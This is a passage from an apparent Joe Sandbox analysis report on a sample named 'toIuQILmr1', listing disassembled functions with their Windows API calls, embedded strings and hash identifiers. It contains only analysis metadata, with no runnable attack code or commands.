                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: b8f9ad47dba447b0c25db14a9e2f3224e7df273b98ac234197e33601aa2db5d8
                                          • Instruction ID: 68863989e24dd16b354fd12793e4d44bc520e3c1380aaa122375adf7ede2bef0
                                          • Opcode Fuzzy Hash: b8f9ad47dba447b0c25db14a9e2f3224e7df273b98ac234197e33601aa2db5d8
                                          • Instruction Fuzzy Hash: E8A1D4702143159FCB14EF20C951A6AB7E5FF84319F106869BC9A6B7E2DB30EC49CB61
                                          Function 00E452F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00E45309
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00E45314
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E4531F
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00E4532A
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00E45335
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00E45340
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00E4534B
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00E45356
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00E45361
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00E4536C
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00E45377
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00E45382
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00E4538D
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00E45398
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00E453A3
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00E453AE
                                          • GetCursorInfo.USER32(?), ref: 00E453BE
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00E453E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: 8ddebeb63f30a9556d5df13e3edbfecf5828b9ca64ec05c4739b6917bb59462a
                                          • Instruction ID: 082e98ca8126843fcce57d126220192a21526748ef1b87cf12c85ac31d954bc0
                                          • Opcode Fuzzy Hash: 8ddebeb63f30a9556d5df13e3edbfecf5828b9ca64ec05c4739b6917bb59462a
                                          • Instruction Fuzzy Hash: 32418271E043196BDB109FBA9C4996EFEB8EF41B50B10452BE519E7291DAB8A4008E61
                                          Function 00E2AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2AAA5
                                          • __swprintf.LIBCMT ref: 00E2AB46
                                          • _wcscmp.LIBCMT ref: 00E2AB59
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E2ABAE
                                          • _wcscmp.LIBCMT ref: 00E2ABEA
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E2AC21
                                          • GetDlgCtrlID.USER32(?), ref: 00E2AC73
                                          • GetWindowRect.USER32(?,?), ref: 00E2ACA9
                                          • GetParent.USER32(?), ref: 00E2ACC7
                                          • ScreenToClient.USER32(00000000), ref: 00E2ACCE
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2AD48
                                          • _wcscmp.LIBCMT ref: 00E2AD5C
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E2AD82
                                          • _wcscmp.LIBCMT ref: 00E2AD96
                                            • Part of subcall function 00DF386C: _iswctype.LIBCMT ref: 00DF3874
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 342e041622634ca8dbf054ae131783cd2c1d2afa6d0f3e4c1ccd3f8461c3ec93
                                          • Instruction ID: 99f374172b41825d9681bbfc5eb1cfe3880acdc16d7c6a344b82f494d45aa690
                                          • Opcode Fuzzy Hash: 342e041622634ca8dbf054ae131783cd2c1d2afa6d0f3e4c1ccd3f8461c3ec93
                                          • Instruction Fuzzy Hash: 0FA1E471204726AFD718DF20D884BAAF7E8FF44319F189639F999E2150D730E945CBA2
                                          Function 00E2B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E2B3DB
                                          • _wcscmp.LIBCMT ref: 00E2B3EC
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E2B414
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E2B431
                                          • _wcscmp.LIBCMT ref: 00E2B44F
                                          • _wcsstr.LIBCMT ref: 00E2B460
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E2B498
                                          • _wcscmp.LIBCMT ref: 00E2B4A8
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E2B4CF
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E2B518
                                          • _wcscmp.LIBCMT ref: 00E2B528
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E2B550
                                          • GetWindowRect.USER32(00000004,?), ref: 00E2B5B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: d3b2915f6efb152d3888c425db41c9d6400061edb25df79682d686ca6eced0a7
                                          • Instruction ID: 96494f82c5e63db706c90a974a2602312e8c3c5d843d7b37e90de42c0f89639f
                                          • Opcode Fuzzy Hash: d3b2915f6efb152d3888c425db41c9d6400061edb25df79682d686ca6eced0a7
                                          • Instruction Fuzzy Hash: 9C81D4710043199FDB04DF10E885FAA77E9FF44318F08956AFD85AA092EB34DD49CBA1
                                          Function 00E2B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: c9bb407ce5e9d960c90a7fc6936a919740eb39086709f33c603262c8f1884393
                                          • Instruction ID: 9416e181797f2d5773efbc165b0268d69b2d02e5b676132d7463f83b8eb76e9b
                                          • Opcode Fuzzy Hash: c9bb407ce5e9d960c90a7fc6936a919740eb39086709f33c603262c8f1884393
                                          • Instruction Fuzzy Hash: B9316D32A44319E6DB14FA60ED43EFE77A4DF10750F64212AB44A711E2FF62AE04D671
                                          Function 00E2C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 00E2C4D4
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E2C4E6
                                          • SetWindowTextW.USER32(?,?), ref: 00E2C4FD
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E2C512
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E2C518
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C528
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E2C52E
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E2C54F
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E2C569
                                          • GetWindowRect.USER32(?,?), ref: 00E2C572
                                          • SetWindowTextW.USER32(?,?), ref: 00E2C5DD
                                          • GetDesktopWindow.USER32 ref: 00E2C5E3
                                          • GetWindowRect.USER32(00000000), ref: 00E2C5EA
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E2C636
                                          • GetClientRect.USER32(?,?), ref: 00E2C643
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E2C668
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E2C693
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 08ace9e685bd6ae158bad6f3ad7d1c79354f0eb88ec5605ba0c67cbf0b63641f
                                          • Instruction ID: c5266c6271762fc06ef174dbdba3169236e2111617433c7496631192a26abacb
                                          • Opcode Fuzzy Hash: 08ace9e685bd6ae158bad6f3ad7d1c79354f0eb88ec5605ba0c67cbf0b63641f
                                          • Instruction Fuzzy Hash: EA516B70900709AFDB209FA9DD89B6FBBF5FF04705F104929E686B25A0C775E948CB50
                                          Function 00E5A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E5A4C8
                                          • DestroyWindow.USER32(?,?), ref: 00E5A542
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E5A5BC
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E5A5DE
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E5A5F1
                                          • DestroyWindow.USER32(00000000), ref: 00E5A613
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DD0000,00000000), ref: 00E5A64A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E5A663
                                          • GetDesktopWindow.USER32 ref: 00E5A67C
                                          • GetWindowRect.USER32(00000000), ref: 00E5A683
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E5A69B
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E5A6B3
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 2e16a0ebd53101e2599e3daf4e394e550ce36fa3bd48dcfcdb795d9f299d85eb
                                          • Instruction ID: d533e52aea1ec7c06e37738cb7dc74b13e5080b95afd679dfc5896d8f5951a0a
                                          • Opcode Fuzzy Hash: 2e16a0ebd53101e2599e3daf4e394e550ce36fa3bd48dcfcdb795d9f299d85eb
                                          • Instruction Fuzzy Hash: 0371B175140305AFD724DF28DC49F667BE5FB88305F084A2EF985A72A0D7B0E909CB62
                                          Function 00E54619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E546AB
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E546F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 63727495e53134ba9d3fa9259d949421b1a058df460efc3b52493932db5b4a9c
                                          • Instruction ID: 59f0314995d9c326066e2b1221818ea5cf6116b0edd78f955af7b6feee0cbebd
                                          • Opcode Fuzzy Hash: 63727495e53134ba9d3fa9259d949421b1a058df460efc3b52493932db5b4a9c
                                          • Instruction Fuzzy Hash: AE917F742043159BCB14EF20C851A6AB7E1EF85318F04A85DFC9A6B7A3DB31ED49CB61
                                          Function 00E5BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E5BB6E
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E59431), ref: 00E5BBCA
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E5BC03
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E5BC46
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E5BC7D
                                          • FreeLibrary.KERNEL32(?), ref: 00E5BC89
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5BC99
                                          • DestroyCursor.USER32(?), ref: 00E5BCA8
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E5BCC5
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E5BCD1
                                            • Part of subcall function 00DF313D: __wcsicmp_l.LIBCMT ref: 00DF31C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 3907162815-1154884017
                                          • Opcode ID: 2af4a70d467e8084c9f0258e3f9f09f7855dc80b9902169c251cd10579386ab8
                                          • Instruction ID: 9f09fda1dfa9f1551fa8c025d5628b9d7b73ce16e456c63c57c0ac23d276dda0
                                          • Opcode Fuzzy Hash: 2af4a70d467e8084c9f0258e3f9f09f7855dc80b9902169c251cd10579386ab8
                                          • Instruction Fuzzy Hash: 1F61E171540719BEEB14DF64CC45FBAB7A8EB08712F105916FD15E61D0DB70AA88CBB0
                                          Function 00E3A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00E5FB78), ref: 00E3A0FC
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E3A11E
                                          • __swprintf.LIBCMT ref: 00E3A177
                                          • __swprintf.LIBCMT ref: 00E3A190
                                          • _wprintf.LIBCMT ref: 00E3A246
                                          • _wprintf.LIBCMT ref: 00E3A264
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                          • API String ID: 311963372-1048875529
                                          • Opcode ID: 55217c7f213d6562a4e51fb30d993eb33fee87c109ba1f68dddc80b451093622
                                          • Instruction ID: b4dd0573396d2e35537d422d5a6f388799f244f9ab8d0aed54978b5d9c413f57
                                          • Opcode Fuzzy Hash: 55217c7f213d6562a4e51fb30d993eb33fee87c109ba1f68dddc80b451093622
                                          • Instruction Fuzzy Hash: 67515C7190021AAACF15EBE0DD86EEEB779EF04304F1411A6F505721A1EB316F98DB71
                                          Function 00E3A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CharLowerBuffW.USER32(?,?), ref: 00E3A636
                                          • GetDriveTypeW.KERNEL32 ref: 00E3A683
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A6CB
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A702
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E3A730
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 07ccd8340aa226b652ae9677f034583c57648311143b9e0fa49e4c9709e8c241
                                          • Instruction ID: 7004f347f569bc22d6edc24da6589eeab87065ec36a35a43ab7bb3d0a61061aa
                                          • Opcode Fuzzy Hash: 07ccd8340aa226b652ae9677f034583c57648311143b9e0fa49e4c9709e8c241
                                          • Instruction Fuzzy Hash: 7E514C711043059FC714EF20C89196AB7F4FF94718F08596EF89A67361EB31AE0ACB62
                                          Function 00E3A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E3A47A
                                          • __swprintf.LIBCMT ref: 00E3A49C
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E3A4D9
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E3A4FE
                                          • _memset.LIBCMT ref: 00E3A51D
                                          • _wcsncpy.LIBCMT ref: 00E3A559
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E3A58E
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3A599
                                          • RemoveDirectoryW.KERNEL32(?), ref: 00E3A5A2
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3A5AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
